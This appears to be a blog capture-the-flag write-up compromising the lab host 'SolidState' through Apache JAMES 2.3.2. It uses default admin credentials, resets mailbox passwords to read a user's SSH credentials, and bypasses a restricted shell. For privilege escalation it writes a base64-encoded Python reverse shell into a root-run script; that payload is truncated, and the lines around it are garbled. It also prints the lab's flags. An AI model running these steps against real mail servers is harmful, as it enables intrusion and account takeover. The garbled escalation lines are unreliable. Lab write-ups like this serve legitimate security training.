Apache JAMES RCE

0 19
Information CollectionIP AddressOpening Ports10.10.10.51TCP:22, 25, 80, 110, 119...

Information Collection

IP AddressOpening Ports
10.10.10.51TCP:22, 25, 80, 110, 119, 4555

$ nmap -p- 10.10.10.51 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello 10.10.10.51 (10.10.16.24 [10.10.16.24])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.94SVN%I=7%D=8/17%Time=66C06866%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\
SF:nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPas
SF:sword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache JAMES RCE

JAMES Remote Administration Tool

searchsploit JAMES

Apache JAMES RCE

image.png

username:root password:root

image-1.png

image-2.png

telnet 10.10.10.51 4555

>listusers

user: james
user: //etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin

setpassword mindy 123

POP3

Log in as user mindy

telnet 10.10.10.51 110

USER mindy

PASS 123

RETR 2

image-3.png

username:mindy password:P@55W0rd1!2@

ssh mindy@10.10.10.51

image-4.png

In fact, the meaning of the question here is to directly reflect a session of JAME-RCE to the host to obtain a non-restricted shell, but the ssh command can use -t to construct a pseudo terminal and bypass it as well

ssh mindy@10.10.10.51 -t 'bash'

image-5.png

User.txt

cddc54e8618e72785b2d0387162f772b

Privilege Escalation

image-6.png

List files in directory /opt/tmp.py

image-7.png

echo 'aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTAuMTAu' | base64 -d > /opt/tmp.py
Version 10.10.10.10, 2022-07-25, Build 3.2.1, Release
Execute the command 'echo 'aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTAuMTAu' | base64 -d > /opt/tmp.py' in directory /opt/tmp.py

image-8.png

Root.txt

2937292653a4a3a7b70ca523057708df

你可能想看:

HTTP data packets & request methods & status code judgment & brute force encryption password & exploiting data packets

Git leak && AWS AKSK && AWS Lambda cli && Function Information Leakage && JWT secret leak

5. Collect exercise results The main person in charge reviews the exercise results, sorts out the separated exercise issues, and allows the red and blue sides to improve as soon as possible. The main

It is possible to perform credible verification on the system boot program, system program, important configuration parameters, and application programs of computing devices based on a credible root,

Distributed Storage Technology (Part 2): Analysis of the architecture, principles, characteristics, and advantages and disadvantages of wide-column storage and full-text search engines

2025 latest & emulator WeChat mini-program packet capture & mini-program reverse engineering

Dubbo Architecture Design and Source Code Analysis (Part Three) Chain of Responsibility Pattern

Ensure that the ID can be accessed even if it is guessed or cannot be tampered with; the scenario is common in resource convenience and unauthorized vulnerability scenarios. I have found many vulnerab

Deception defense for advanced threat detection: enhance security orchestration, automation, and response capabilities

Article 2 of the Cryptography Law clearly defines the term 'cryptography', which does not include commonly known terms such as 'bank card password', 'login password', as well as facial recognition, fi

最后修改时间:
admin
上一篇 2025年03月27日 04:42
下一篇 2025年03月27日 05:05

评论已关闭